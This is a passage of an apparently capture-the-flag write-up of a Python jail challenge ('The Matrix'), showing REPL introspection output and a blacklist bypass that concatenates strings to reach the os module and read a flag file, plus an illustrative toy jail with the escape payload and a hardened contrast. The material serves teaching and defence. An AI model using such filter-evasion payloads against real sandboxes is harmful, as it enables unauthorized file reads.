class="kc">None</span><span class="p">,</span> <span class="s1">'sys'</span><span class="p">:</span> <span class="o"><</span><span class="n">module</span> <span class="s1">'sys'</span> <span class="p">(</span><span class="n">built</span><span class="o">-</span><span class="ow">in</span><span class="p">)</span><span class="o">></span><span class="p">,</span> <span class="s1">'signal'</span><span class="p">:</span> <span class="o"><</span><span class="n">module</span> <span class="s1">'signal'</span> <span class="kn">from</span> <span 
class="s1">'/usr/lib/python3.7/signal.py'</span><span class="o">></span><span class="p">,</span> <span class="s1">'bye'</span><span class="p">:</span> <span class="o"><</span><span class="n">function</span> <span class="n">bye</span> <span class="n">at</span> <span class="mh">0x7fddf76b71e0</span><span class="o">></span><span class="p">,</span> <span class="s1">'sigterm_handler'</span><span class="p">:</span> <span class="o"><</span><span class="n">function</span> <span class="n">sigterm_handler</span> <span class="n">at</span> <span class="mh">0x7fddf75c0d08</span><span class="o">></span><span class="p">,</span> <span class="s1">'banner'</span><span class="p">:</span> <span class="o"><</span><span class="n">function</span> <span class="n">banner</span> <span class="n">at</span> <span class="mh">0x7fddf75c0d90</span><span class="o">></span><span class="p">,</span> <span class="s1">'filtering_small'</span><span class="p">:</span> <span class="o"><</span><span class="n">function</span> <span class="n">filtering_small</span> <span class="n">at</span> <span class="mh">0x7fddf75c0e18</span><span class="o">></span><span class="p">,</span> <span class="s1">'filtering'</span><span class="p">:</span> <span class="o"><</span><span class="n">function</span> <span class="n">filtering</span> <span class="n">at</span> <span class="mh">0x7fddf75c0ea0</span><span class="o">></span><span class="p">,</span> <span class="s1">'jail'</span><span class="p">:</span> <span class="o"><</span><span class="n">function</span> <span class="n">jail</span> <span class="n">at</span> <span class="mh">0x7fddf75c0f28</span><span class="o">></span><span class="p">}</span>
<span class="c1"># Without arguments, return the list of names in the current local scope. With an argument, attempt to return a list of valid attributes for that object.</span>
<span class="n">THE</span> <span class="n">MATRIX</span> <span class="o">>>></span> <span class="nb">print</span><span class="p">(</span><span class="nb">dir</span><span class="p">())</span>
<span class="p">[</span><span class="s1">'matrix'</span><span class="p">,</span> <span class="s1">'res'</span><span class="p">]</span>
<span class="c1"># If the object has a method named __dir__(), this method will be called and must return the list of attributes. This allows objects that implement a custom __getattr__() or __getattribute__() function to customize the way dir() reports their attributes.</span>
<span class="n">THE</span> <span class="n">MATRIX</span> <span class="o">>>></span> <span class="nb">print</span><span class="p">(</span><span class="nb">dir</span><span class="p">(</span><span class="n">matrix</span><span class="p">))</span>
<span class="p">[</span><span class="s1">'__bool__'</span><span class="p">,</span> <span class="s1">'__class__'</span><span class="p">,</span> <span class="s1">'__delattr__'</span><span class="p">,</span> <span class="s1">'__dir__'</span><span class="p">,</span> <span class="s1">'__doc__'</span><span class="p">,</span> <span class="s1">'__eq__'</span><span class="p">,</span> <span class="s1">'__format__'</span><span class="p">,</span> <span class="s1">'__ge__'</span><span class="p">,</span> <span class="s1">'__getattribute__'</span><span class="p">,</span> <span class="s1">'__gt__'</span><span class="p">,</span> <span class="s1">'__hash__'</span><span class="p">,</span> <span class="s1">'__init__'</span><span class="p">,</span> <span class="s1">'__init_subclass__'</span><span class="p">,</span> <span class="s1">'__le__'</span><span class="p">,</span> <span class="s1">'__lt__'</span><span class="p">,</span> <span class="s1">'__ne__'</span><span class="p">,</span> <span class="s1">'__new__'</span><span class="p">,</span> <span class="s1">'__reduce__'</span><span class="p">,</span> <span class="s1">'__reduce_ex__'</span><span class="p">,</span> <span class="s1">'__repr__'</span><span class="p">,</span> <span class="s1">'__setattr__'</span><span class="p">,</span> <span class="s1">'__sizeof__'</span><span class="p">,</span> <span class="s1">'__str__'</span><span class="p">,</span> <span class="s1">'__subclasshook__'</span><span class="p">]</span>
<span class="n">THE</span> <span class="n">MATRIX</span> <span class="o">>>></span> <span class="nb">print</span><span class="p">(</span><span class="nb">dir</span><span class="p">(</span><span class="n">res</span><span class="p">))</span>
<span class="p">[</span><span class="s1">'__add__'</span><span class="p">,</span> <span class="s1">'__class__'</span><span class="p">,</span> <span class="s1">'__contains__'</span><span class="p">,</span> <span class="s1">'__delattr__'</span><span class="p">,</span> <span class="s1">'__dir__'</span><span class="p">,</span> <span class="s1">'__doc__'</span><span class="p">,</span> <span class="s1">'__eq__'</span><span class="p">,</span> <span class="s1">'__format__'</span><span class="p">,</span> <span class="s1">'__ge__'</span><span class="p">,</span> <span class="s1">'__getattribute__'</span><span class="p">,</span> <span class="s1">'__getitem__'</span><span class="p">,</span> <span class="s1">'__getnewargs__'</span><span class="p">,</span> <span class="s1">'__gt__'</span><span class="p">,</span> <span class="s1">'__hash__'</span><span class="p">,</span> <span class="s1">'__init__'</span><span class="p">,</span> <span class="s1">'__init_subclass__'</span><span class="p">,</span> <span class="s1">'__iter__'</span><span class="p">,</span> <span class="s1">'__le__'</span><span class="p">,</span> <span class="s1">'__len__'</span><span class="p">,</span> <span class="s1">'__lt__'</span><span class="p">,</span> <span class="s1">'__mod__'</span><span class="p">,</span> <span class="s1">'__mul__'</span><span class="p">,</span> <span class="s1">'__ne__'</span><span class="p">,</span> <span class="s1">'__new__'</span><span class="p">,</span> <span class="s1">'__reduce__'</span><span class="p">,</span> <span class="s1">'__reduce_ex__'</span><span class="p">,</span> <span class="s1">'__repr__'</span><span class="p">,</span> <span class="s1">'__rmod__'</span><span class="p">,</span> <span class="s1">'__rmul__'</span><span class="p">,</span> <span class="s1">'__setattr__'</span><span class="p">,</span> <span class="s1">'__sizeof__'</span><span class="p">,</span> <span class="s1">'__str__'</span><span class="p">,</span> <span class="s1">'__subclasshook__'</span><span 
class="p">,</span> <span class="s1">'capitalize'</span><span class="p">,</span> <span class="s1">'casefold'</span><span class="p">,</span> <span class="s1">'center'</span><span class="p">,</span> <span class="s1">'count'</span><span class="p">,</span> <span class="s1">'encode'</span><span class="p">,</span> <span class="s1">'endswith'</span><span class="p">,</span> <span class="s1">'expandtabs'</span><span class="p">,</span> <span class="s1">'find'</span><span class="p">,</span> <span class="s1">'format'</span><span class="p">,</span> <span class="s1">'format_map'</span><span class="p">,</span> <span class="s1">'index'</span><span class="p">,</span> <span class="s1">'isalnum'</span><span class="p">,</span> <span class="s1">'isalpha'</span><span class="p">,</span> <span class="s1">'isascii'</span><span class="p">,</span> <span class="s1">'isdecimal'</span><span class="p">,</span> <span class="s1">'isdigit'</span><span class="p">,</span> <span class="s1">'isidentifier'</span><span class="p">,</span> <span class="s1">'islower'</span><span class="p">,</span> <span class="s1">'isnumeric'</span><span class="p">,</span> <span class="s1">'isprintable'</span><span class="p">,</span> <span class="s1">'isspace'</span><span class="p">,</span> <span class="s1">'istitle'</span><span class="p">,</span> <span class="s1">'isupper'</span><span class="p">,</span> <span class="s1">'join'</span><span class="p">,</span> <span class="s1">'ljust'</span><span class="p">,</span> <span class="s1">'lower'</span><span class="p">,</span> <span class="s1">'lstrip'</span><span class="p">,</span> <span class="s1">'maketrans'</span><span class="p">,</span> <span class="s1">'partition'</span><span class="p">,</span> <span class="s1">'replace'</span><span class="p">,</span> <span class="s1">'rfind'</span><span class="p">,</span> <span class="s1">'rindex'</span><span class="p">,</span> <span class="s1">'rjust'</span><span class="p">,</span> <span class="s1">'rpartition'</span><span class="p">,</span> 
<span class="s1">'rsplit'</span><span class="p">,</span> <span class="s1">'rstrip'</span><span class="p">,</span> <span class="s1">'split'</span><span class="p">,</span> <span class="s1">'splitlines'</span><span class="p">,</span> <span class="s1">'startswith'</span><span class="p">,</span> <span class="s1">'strip'</span><span class="p">,</span> <span class="s1">'swapcase'</span><span class="p">,</span> <span class="s1">'title'</span><span class="p">,</span> <span class="s1">'translate'</span><span class="p">,</span> <span class="s1">'upper'</span><span class="p">,</span> <span class="s1">'zfill'</span><span class="p">]</span>
</code></pre></div>
<p>So we have access to all of these. Our goal is to display the contents of a file (<code>flag.txt</code>), so we need to reach the Python <code>os</code> module and its file functions (<code>open</code> and <code>read</code>).
We cannot use <code>import</code> directly, because Trinity answers with her message. So we have to be cunning and go through <code>sys</code>, which we can reach via <code>globals()</code>.</p>
<div class="highlight"><pre><span></span><code><span class="n">THE</span> <span class="n">MATRIX</span> <span class="o">>>></span> <span class="n">a</span><span class="o">=</span><span class="nb">globals</span><span class="p">()[</span><span class="s2">"sys"</span><span class="p">]</span>
<span class="p">(</span><span class="err">⌐■</span><span class="n">_</span><span class="err">■</span><span class="p">)</span> <span class="o"><</span><span class="n">Trinity</span><span class="o">></span><span class="p">:</span> <span class="n">No</span> <span class="n">one</span> <span class="n">has</span> <span class="n">ever</span> <span class="n">done</span> <span class="n">anything</span> <span class="n">like</span> <span class="n">this</span>
</code></pre></div>
<p>OK, Trinity is keeping an eye on us. The filter evidently matches forbidden substrings in the line we type, not in the value that ends up being evaluated, so no problem: we split the string in two and concatenate it back:</p>
<div class="highlight"><pre><span></span><code><span class="n">THE</span> <span class="n">MATRIX</span> <span class="o">>>></span> <span class="n">a</span><span class="o">=</span><span class="nb">globals</span><span class="p">()[</span><span class="s2">"s"</span><span class="o">+</span><span class="s2">"ys"</span><span class="p">]</span>
<span class="n">THE</span> <span class="n">MATRIX</span> <span class="o">>>></span> <span class="nb">print</span><span class="p">(</span><span class="nb">dir</span><span class="p">(</span><span class="n">a</span><span class="p">))</span>
<span class="p">[</span><span class="s1">'__breakpointhook__'</span><span class="p">,</span> <span class="s1">'__displayhook__'</span><span class="p">,</span> <span class="s1">'__doc__'</span><span class="p">,</span> <span class="s1">'__excepthook__'</span><span class="p">,</span> <span class="s1">'__interactivehook__'</span><span class="p">,</span> <span class="s1">'__loader__'</span><span class="p">,</span> <span class="s1">'__name__'</span><span class="p">,</span> <span class="s1">'__package__'</span><span class="p">,</span> <span class="s1">'__spec__'</span><span class="p">,</span> <span class="s1">'__stderr__'</span><span class="p">,</span> <span class="s1">'__stdin__'</span><span class="p">,</span> <span class="s1">'__stdout__'</span><span class="p">,</span> <span class="s1">'_clear_type_cache'</span><span class="p">,</span> <span class="s1">'_current_frames'</span><span class="p">,</span> <span class="s1">'_debugmallocstats'</span><span class="p">,</span> <span class="s1">'_framework'</span><span class="p">,</span> <span class="s1">'_getframe'</span><span class="p">,</span> <span class="s1">'_git'</span><span class="p">,</span> <span class="s1">'_home'</span><span class="p">,</span> <span class="s1">'_xoptions'</span><span class="p">,</span> <span class="s1">'abiflags'</span><span class="p">,</span> <span class="s1">'api_version'</span><span class="p">,</span> <span class="s1">'argv'</span><span class="p">,</span> <span class="s1">'base_exec_prefix'</span><span class="p">,</span> <span class="s1">'base_prefix'</span><span class="p">,</span> <span class="s1">'breakpointhook'</span><span class="p">,</span> <span class="s1">'builtin_module_names'</span><span class="p">,</span> <span class="s1">'byteorder'</span><span class="p">,</span> <span class="s1">'call_tracing'</span><span class="p">,</span> <span class="s1">'callstats'</span><span class="p">,</span> <span class="s1">'copyright'</span><span class="p">,</span> <span class="s1">'displayhook'</span><span 
class="p">,</span> <span class="s1">'dont_write_bytecode'</span><span class="p">,</span> <span class="s1">'exc_info'</span><span class="p">,</span> <span class="s1">'excepthook'</span><span class="p">,</span> <span class="s1">'exec_prefix'</span><span class="p">,</span> <span class="s1">'executable'</span><span class="p">,</span> <span class="s1">'exit'</span><span class="p">,</span> <span class="s1">'flags'</span><span class="p">,</span> <span class="s1">'float_info'</span><span class="p">,</span> <span class="s1">'float_repr_style'</span><span class="p">,</span> <span class="s1">'get_asyncgen_hooks'</span><span class="p">,</span> <span class="s1">'get_coroutine_origin_tracking_depth'</span><span class="p">,</span> <span class="s1">'get_coroutine_wrapper'</span><span class="p">,</span> <span class="s1">'getallocatedblocks'</span><span class="p">,</span> <span class="s1">'getcheckinterval'</span><span class="p">,</span> <span class="s1">'getdefaultencoding'</span><span class="p">,</span> <span class="s1">'getdlopenflags'</span><span class="p">,</span> <span class="s1">'getfilesystemencodeerrors'</span><span class="p">,</span> <span class="s1">'getfilesystemencoding'</span><span class="p">,</span> <span class="s1">'getprofile'</span><span class="p">,</span> <span class="s1">'getrecursionlimit'</span><span class="p">,</span> <span class="s1">'getrefcount'</span><span class="p">,</span> <span class="s1">'getsizeof'</span><span class="p">,</span> <span class="s1">'getswitchinterval'</span><span class="p">,</span> <span class="s1">'gettrace'</span><span class="p">,</span> <span class="s1">'hash_info'</span><span class="p">,</span> <span class="s1">'hexversion'</span><span class="p">,</span> <span class="s1">'implementation'</span><span class="p">,</span> <span class="s1">'int_info'</span><span class="p">,</span> <span class="s1">'intern'</span><span class="p">,</span> <span class="s1">'is_finalizing'</span><span class="p">,</span> <span class="s1">'maxsize'</span><span 
class="p">,</span> <span class="s1">'maxunicode'</span><span class="p">,</span> <span class="s1">'meta_path'</span><span class="p">,</span> <span class="s1">'modules'</span><span class="p">,</span> <span class="s1">'path'</span><span class="p">,</span> <span class="s1">'path_hooks'</span><span class="p">,</span> <span class="s1">'path_importer_cache'</span><span class="p">,</span> <span class="s1">'platform'</span><span class="p">,</span> <span class="s1">'prefix'</span><span class="p">,</span> <span class="s1">'set_asyncgen_hooks'</span><span class="p">,</span> <span class="s1">'set_coroutine_origin_tracking_depth'</span><span class="p">,</span> <span class="s1">'set_coroutine_wrapper'</span><span class="p">,</span> <span class="s1">'setcheckinterval'</span><span class="p">,</span> <span class="s1">'setdlopenflags'</span><span class="p">,</span> <span class="s1">'setprofile'</span><span class="p">,</span> <span class="s1">'setrecursionlimit'</span><span class="p">,</span> <span class="s1">'setswitchinterval'</span><span class="p">,</span> <span class="s1">'settrace'</span><span class="p">,</span> <span class="s1">'stderr'</span><span class="p">,</span> <span class="s1">'stdin'</span><span class="p">,</span> <span class="s1">'stdout'</span><span class="p">,</span> <span class="s1">'thread_info'</span><span class="p">,</span> <span class="s1">'version'</span><span class="p">,</span> <span class="s1">'version_info'</span><span class="p">,</span> <span class="s1">'warnoptions'</span><span class="p">]</span>
</code></pre></div>
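<p>To make the escape route explicit, here is an added example (mine, not the challenge's <code>jail.py</code>, whose filter rules are not on the page): a toy jail that, like the one above, keeps <code>sys</code> in its module globals and applies a substring blacklist to the raw input line. The <code>FORBIDDEN</code> list, the <code>jail_eval</code> wrapper and the flag file are my assumptions. The payload reaches <code>os</code> through <code>globals()["s"+"ys"].modules["os"]</code> and reads the file with <code>os.open</code>/<code>os.read</code>, never writing <code>sys</code> or <code>open(</code> in the line; the same payload is then run in a fresh, empty globals dict to show that the route depends entirely on <code>sys</code> being reachable from the jail's namespace.</p>

```python
import os
import sys
import tempfile

# Constructed flag and an assumed blacklist modelled on the behaviour seen in the
# challenge: "sys" and "import" in the typed line trigger Trinity's message.
FLAG = "ECW{constructed_flag_for_the_example}"
FORBIDDEN = ("import", "sys", "open(")


def filtering(line: str) -> bool:
    """Substring blacklist applied to the raw input line, as a naive jail does."""
    return any(word in line for word in FORBIDDEN)


def jail_eval(line: str, env: dict):
    """Execute one line with `env` as its globals unless the filter fires."""
    if filtering(line):
        return "(⌐■_■) <Trinity>: No one has ever done anything like this"
    exec(line, env)
    return env.get("res")


def escape_payload(flag_path: str) -> str:
    """One line reaching os via globals()['sys'].modules, with the forbidden words
    split into concatenated fragments so the text filter never sees them."""
    m = 'globals()["s"+"ys"].modules["os"]'
    return (f'fd = getattr({m}, "op"+"en")({flag_path!r}, {m}.O_RDONLY); '
            f'res = {m}.read(fd, 128).decode(); {m}.close(fd)')


def demo():
    """Run the payload against a jail whose globals contain sys (as on the page),
    then against one whose globals are a fresh empty dict. Returns both results."""
    path = os.path.join(tempfile.gettempdir(), "ecw_matrix_flag.txt")
    with open(path, "w") as f:
        f.write(FLAG)
    try:
        payload = escape_payload(path)
        assert not filtering(payload)              # the blacklist lets it through
        vulnerable = jail_eval(payload, {"sys": sys})
        try:
            hardened = jail_eval(payload, {})      # no sys in globals: KeyError
        except KeyError as e:
            hardened = f"KeyError: {e}"
    finally:
        os.remove(path)
    return vulnerable, hardened


if __name__ == "__main__":
    vulnerable, hardened = demo()
    print("jail with sys in globals :", vulnerable)
    print("jail with empty globals  :", hardened)
```

The empty-globals variant only closes this particular door. Executing untrusted code with <code>exec</code> is still not safe even with a trimmed <code>__builtins__</code>, since object introspection (<code>__class__</code>, <code>__subclasses__</code>) walks from any literal to already-loaded modules; the real fix is not to <code>exec</code> user input at all.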
<p>There is our <code>modules</code> dict, with <code>os</code> in it. So we can get at the file-handling functions :D.</p>
<div class="highlight"><pre><span></span><code><span class="n">THE</span> <span class="n">MATRIX</span> <span class="o">>>></span> <span class="nb">print</span><span class="p">(</span><span class="nb">dir</span><span class="p">(</span><span class="n">a</span><span class="o">.</span><span class="n">modules</span><span class="p">[</span><span class="s2">"os"</span><span class="p">]))</span>
<span class="p">[</span><span class="s1">'CLD_CONTINUED'</span><span class="p">,</span> <span class="s1">'CLD_DUMPED'</span><span class="p">,</span> <span class="s1">'CLD_EXITED'</span><span class="p">,</span> <span class="s1">'CLD_TRAPPED'</span><span class="p">,</span> <span class="s1">'DirEntry'</span><span class="p">,</span> <span class="s1">'EX_CANTCREAT'</span><span class="p">,</span> <span class="s1">'EX_CONFIG'</span><span class="p">,</span> <span class="s1">'EX_DATAERR'</span><span class="p">,</span> <span class="s1">'EX_IOERR'</span><span class="p">,</span> <span class="s1">'EX_NOHOST'</span><span class="p">,</span> <span class="s1">'EX_NOINPUT'</span><span class="p">,</span> <span class="s1">'EX_NOPERM'</span><span class="p">,</span> <span class="s1">'EX_NOUSER'</span><span class="p">,</span> <span class="s1">'EX_OK'</span><span class="p">,</span> <span class="s1">'EX_OSERR'</span><span class="p">,</span> <span class="s1">'EX_OSFILE'</span><span class="p">,</span> <span class="s1">'EX_PROTOCOL'</span><span class="p">,</span> <span class="s1">'EX_SOFTWARE'</span><span class="p">,</span> <span class="s1">'EX_TEMPFAIL'</span><span class="p">,</span> <span class="s1">'EX_UNAVAILABLE'</span><span class="p">,</span> <span class="s1">'EX_USAGE'</span><span class="p">,</span> <span class="s1">'F_LOCK'</span><span class="p">,</span> <span class="s1">'F_OK'</span><span class="p">,</span> <span class="s1">'F_TEST'</span><span class="p">,</span> <span class="s1">'F_TLOCK'</span><span class="p">,</span> <span class="s1">'F_ULOCK'</span><span class="p">,</span> <span class="s1">'GRND_NONBLOCK'</span><span class="p">,</span> <span class="s1">'GRND_RANDOM'</span><span class="p">,</span> <span class="s1">'MutableMapping'</span><span class="p">,</span> <span class="s1">'NGROUPS_MAX'</span><span class="p">,</span> <span class="s1">'O_ACCMODE'</span><span class="p">,</span> <span class="s1">'O_APPEND'</span><span class="p">,</span> <span class="s1">'O_ASYNC'</span><span 
class="p">,</span> <span class="s1">'O_CLOEXEC'</span><span class="p">,</span> <span class="s1">'O_CREAT'</span><span class="p">,</span> <span class="s1">'O_DIRECT'</span><span class="p">,</span> <span class="s1">'O_DIRECTORY'</span><span class="p">,</span> <span class="s1">'O_DSYNC'</span><span class="p">,</span> <span class="s1">'O_EXCL'</span><span class="p">,</span> <span class="s1">'O_EXEC'</span><span class="p">,</span> <span class="s1">'O_LARGEFILE'</span><span class="p">,</span> <span class="s1">'O_NDELAY'</span><span class="p">,</span> <span class="s1">'O_NOATIME'</span><span class="p">,</span> <span class="s1">'O_NOCTTY'</span><span class="p">,</span> <span class="s1">'O_NOFOLLOW'</span><span class="p">,</span> <span class="s1">'O_NONBLOCK'</span><span class="p">,</span> <span class="s1">'O_PATH'</span><span class="p">,</span> <span class="s1">'O_RDONLY'</span><span class="p">,</span> <span class="s1">'O_RDWR'</span><span class="p">,</span> <span class="s1">'O_RSYNC'</span><span class="p">,</span> <span class="s1">'O_SEARCH'</span><span class="p">,</span> <span class="s1">'O_SYNC'</span><span class="p">,</span> <span class="s1">'O_TMPFILE'</span><span class="p">,</span> <span class="s1">'O_TRUNC'</span><span class="p">,</span> <span class="s1">'O_WRONLY'</span><span class="p">,</span> <span class="s1">'POSIX_FADV_DONTNEED'</span><span class="p">,</span> <span class="s1">'POSIX_FADV_NOREUSE'</span><span class="p">,</span> <span class="s1">'POSIX_FADV_NORMAL'</span><span class="p">,</span> <span class="s1">'POSIX_FADV_RANDOM'</span><span class="p">,</span> <span class="s1">'POSIX_FADV_SEQUENTIAL'</span><span class="p">,</span> <span class="s1">'POSIX_FADV_WILLNEED'</span><span class="p">,</span> <span class="s1">'PRIO_PGRP'</span><span class="p">,</span> <span class="s1">'PRIO_PROCESS'</span><span class="p">,</span> <span class="s1">'PRIO_USER'</span><span class="p">,</span> <span class="s1">'P_ALL'</span><span class="p">,</span> <span 
class="s1">'P_NOWAIT'</span><span class="p">,</span> <span class="s1">'P_NOWAITO'</span><span class="p">,</span> <span class="s1">'P_PGID'</span><span class="p">,</span> <span class="s1">'P_PID'</span><span class="p">,</span> <span class="s1">'P_WAIT'</span><span class="p">,</span> <span class="s1">'PathLike'</span><span class="p">,</span> <span class="s1">'RTLD_GLOBAL'</span><span class="p">,</span> <span class="s1">'RTLD_LAZY'</span><span class="p">,</span> <span class="s1">'RTLD_LOCAL'</span><span class="p">,</span> <span class="s1">'RTLD_NODELETE'</span><span class="p">,</span> <span class="s1">'RTLD_NOLOAD'</span><span class="p">,</span> <span class="s1">'RTLD_NOW'</span><span class="p">,</span> <span class="s1">'R_OK'</span><span class="p">,</span> <span class="s1">'SCHED_BATCH'</span><span class="p">,</span> <span class="s1">'SCHED_FIFO'</span><span class="p">,</span> <span class="s1">'SCHED_IDLE'</span><span class="p">,</span> <span class="s1">'SCHED_OTHER'</span><span class="p">,</span> <span class="s1">'SCHED_RESET_ON_FORK'</span><span class="p">,</span> <span class="s1">'SCHED_RR'</span><span class="p">,</span> <span class="s1">'SEEK_CUR'</span><span class="p">,</span> <span class="s1">'SEEK_END'</span><span class="p">,</span> <span class="s1">'SEEK_SET'</span><span class="p">,</span> <span class="s1">'ST_APPEND'</span><span class="p">,</span> <span class="s1">'ST_MANDLOCK'</span><span class="p">,</span> <span class="s1">'ST_NOATIME'</span><span class="p">,</span> <span class="s1">'ST_NODEV'</span><span class="p">,</span> <span class="s1">'ST_NODIRATIME'</span><span class="p">,</span> <span class="s1">'ST_NOEXEC'</span><span class="p">,</span> <span class="s1">'ST_NOSUID'</span><span class="p">,</span> <span class="s1">'ST_RDONLY'</span><span class="p">,</span> <span class="s1">'ST_RELATIME'</span><span class="p">,</span> <span class="s1">'ST_SYNCHRONOUS'</span><span class="p">,</span> <span class="s1">'ST_WRITE'</span><span class="p">,</span> <span 
class="s1">'TMP_MAX'</span><span class="p">,</span> <span class="s1">'WCONTINUED'</span><span class="p">,</span> <span class="s1">'WCOREDUMP'</span><span class="p">,</span> <span class="s1">'WEXITED'</span><span class="p">,</span> <span class="s1">'WEXITSTATUS'</span><span class="p">,</span> <span class="s1">'WIFCONTINUED'</span><span class="p">,</span> <span class="s1">'WIFEXITED'</span><span class="p">,</span> <span class="s1">'WIFSIGNALED'</span><span class="p">,</span> <span class="s1">'WIFSTOPPED'</span><span class="p">,</span> <span class="s1">'WNOHANG'</span><span class="p">,</span> <span class="s1">'WNOWAIT'</span><span class="p">,</span> <span class="s1">'WSTOPPED'</span><span class="p">,</span> <span class="s1">'WSTOPSIG'</span><span class="p">,</span> <span class="s1">'WTERMSIG'</span><span class="p">,</span> <span class="s1">'WUNTRACED'</span><span class="p">,</span> <span class="s1">'W_OK'</span><span class="p">,</span> <span class="s1">'XATTR_CREATE'</span><span class="p">,</span> <span class="s1">'XATTR_REPLACE'</span><span class="p">,</span> <span class="s1">'XATTR_SIZE_MAX'</span><span class="p">,</span> <span class="s1">'X_OK'</span><span class="p">,</span> <span class="s1">'_Environ'</span><span class="p">,</span> <span class="s1">'__all__'</span><span class="p">,</span> <span class="s1">'__builtins__'</span><span class="p">,</span> <span class="s1">'__cached__'</span><span class="p">,</span> <span class="s1">'__doc__'</span><span class="p">,</span> <span class="s1">'__file__'</span><span class="p">,</span> <span class="s1">'__loader__'</span><span class="p">,</span> <span class="s1">'__name__'</span><span class="p">,</span> <span class="s1">'__package__'</span><span class="p">,</span> <span class="s1">'__spec__'</span><span class="p">,</span> <span class="s1">'_execvpe'</span><span class="p">,</span> <span class="s1">'_exists'</span><span class="p">,</span> <span class="s1">'_exit'</span><span class="p">,</span> <span 
class="s1">'_fspath'</span><span class="p">,</span> <span class="s1">'_fwalk'</span><span class="p">,</span> <span class="s1">'_get_exports_list'</span><span class="p">,</span> <span class="s1">'_putenv'</span><span class="p">,</span> <span class="s1">'_spawnvef'</span><span class="p">,</span> <span class="s1">'_unsetenv'</span><span class="p">,</span> <span class="s1">'_wrap_close'</span><span class="p">,</span> <span class="s1">'abc'</span><span class="p">,</span> <span class="s1">'abort'</span><span class="p">,</span> <span class="s1">'access'</span><span class="p">,</span> <span class="s1">'altsep'</span><span class="p">,</span> <span class="s1">'chdir'</span><span class="p">,</span> <span class="s1">'chmod'</span><span class="p">,</span> <span class="s1">'chown'</span><span class="p">,</span> <span class="s1">'chroot'</span><span class="p">,</span> <span class="s1">'close'</span><span class="p">,</span> <span class="s1">'closerange'</span><span class="p">,</span> <span class="s1">'confstr'</span><span class="p">,</span> <span class="s1">'confstr_names'</span><span class="p">,</span> <span class="s1">'cpu_count'</span><span class="p">,</span> <span class="s1">'ctermid'</span><span class="p">,</span> <span class="s1">'curdir'</span><span class="p">,</span> <span class="s1">'defpath'</span><span class="p">,</span> <span class="s1">'device_encoding'</span><span class="p">,</span> <span class="s1">'devnull'</span><span class="p">,</span> <span class="s1">'dup'</span><span class="p">,</span> <span class="s1">'dup2'</span><span class="p">,</span> <span class="s1">'environ'</span><span class="p">,</span> <span class="s1">'environb'</span><span class="p">,</span> <span class="s1">'error'</span><span class="p">,</span> <span class="s1">'execl'</span><span class="p">,</span> <span class="s1">'execle'</span><span class="p">,</span> <span class="s1">'execlp'</span><span class="p">,</span> <span class="s1">'execlpe'</span><span class="p">,</span> <span 
class="s1">'execv'</span><span class="p">,</span> <span class="s1">'execve'</span><span class="p">,</span> <span class="s1">'execvp'</span><span class="p">,</span> <span class="s1">'execvpe'</span><span class="p">,</span> <span class="s1">'extsep'</span><span class="p">,</span> <span class="s1">'fchdir'</span><span class="p">,</span> <span class="s1">'fchmod'</span><span class="p">,</span> <span class="s1">'fchown'</span><span class="p">,</span> <span class="s1">'fdatasync'</span><span class="p">,</span> <span class="s1">'fdopen'</span><span class="p">,</span> <span class="s1">'fork'</span><span class="p">,</span> <span class="s1">'forkpty'</span><span class="p">,</span> <span class="s1">'fpathconf'</span><span class="p">,</span> <span class="s1">'fsdecode'</span><span class="p">,</span> <span class="s1">'fsencode'</span><span class="p">,</span> <span class="s1">'fspath'</span><span class="p">,</span> <span class="s1">'fstat'</span><span class="p">,</span> <span class="s1">'fstatvfs'</span><span class="p">,</span> <span class="s1">'fsync'</span><span class="p">,</span> <span class="s1">'ftruncate'</span><span class="p">,</span> <span class="s1">'fwalk'</span><span class="p">,</span> <span class="s1">'get_blocking'</span><span class="p">,</span> <span class="s1">'get_exec_path'</span><span class="p">,</span> <span class="s1">'get_inheritable'</span><span class="p">,</span> <span class="s1">'get_terminal_size'</span><span class="p">,</span> <span class="s1">'getcwd'</span><span class="p">,</span> <span class="s1">'getcwdb'</span><span class="p">,</span> <span class="s1">'getegid'</span><span class="p">,</span> <span class="s1">'getenv'</span><span class="p">,</span> <span class="s1">'getenvb'</span><span class="p">,</span> <span class="s1">'geteuid'</span><span class="p">,</span> <span class="s1">'getgid'</span><span class="p">,</span> <span class="s1">'getgrouplist'</span><span class="p">,</span> <span class="s1">'getgroups'</span><span class="p">,</span> <span 
class="s1">'getloadavg'</span><span class="p">,</span> <span class="s1">'getlogin'</span><span class="p">,</span> <span class="s1">'getpgid'</span><span class="p">,</span> <span class="s1">'getpgrp'</span><span class="p">,</span> <span class="s1">'getpid'</span><span class="p">,</span> <span class="s1">'getppid'</span><span class="p">,</span> <span class="s1">'getpriority'</span><span class="p">,</span> <span class="s1">'getrandom'</span><span class="p">,</span> <span class="s1">'getresgid'</span><span class="p">,</span> <span class="s1">'getresuid'</span><span class="p">,</span> <span class="s1">'getsid'</span><span class="p">,</span> <span class="s1">'getuid'</span><span class="p">,</span> <span class="s1">'getxattr'</span><span class="p">,</span> <span class="s1">'initgroups'</span><span class="p">,</span> <span class="s1">'isatty'</span><span class="p">,</span> <span class="s1">'kill'</span><span class="p">,</span> <span class="s1">'killpg'</span><span class="p">,</span> <span class="s1">'lchown'</span><span class="p">,</span> <span class="s1">'linesep'</span><span class="p">,</span> <span class="s1">'link'</span><span class="p">,</span> <span class="s1">'listdir'</span><span class="p">,</span> <span class="s1">'listxattr'</span><span class="p">,</span> <span class="s1">'lockf'</span><span class="p">,</span> <span class="s1">'lseek'</span><span class="p">,</span> <span class="s1">'lstat'</span><span class="p">,</span> <span class="s1">'major'</span><span class="p">,</span> <span class="s1">'makedev'</span><span class="p">,</span> <span class="s1">'makedirs'</span><span class="p">,</span> <span class="s1">'minor'</span><span class="p">,</span> <span class="s1">'mkdir'</span><span class="p">,</span> <span class="s1">'mkfifo'</span><span class="p">,</span> <span class="s1">'mknod'</span><span class="p">,</span> <span class="s1">'name'</span><span class="p">,</span> <span class="s1">'nice'</span><span class="p">,</span> <span class="s1">'open'</span><span 
